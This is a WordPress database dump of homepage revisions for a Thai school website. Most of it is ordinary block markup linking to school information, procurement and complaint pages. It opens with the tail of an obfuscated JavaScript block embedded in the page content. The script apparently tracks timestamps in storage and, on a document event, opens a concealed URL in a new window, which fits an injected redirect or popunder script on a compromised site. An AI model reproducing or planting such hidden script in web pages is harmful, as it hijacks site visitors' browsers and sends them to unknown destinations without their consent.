Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-16 10:36:10','2025-06-16 03:36:10','',14,'http://pakhaeng.ssk.in.th/?p=1397',0,'revision','',0),
(1398,1,'2025-06-16 10:36:59','2025-06-16 03:36:59','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 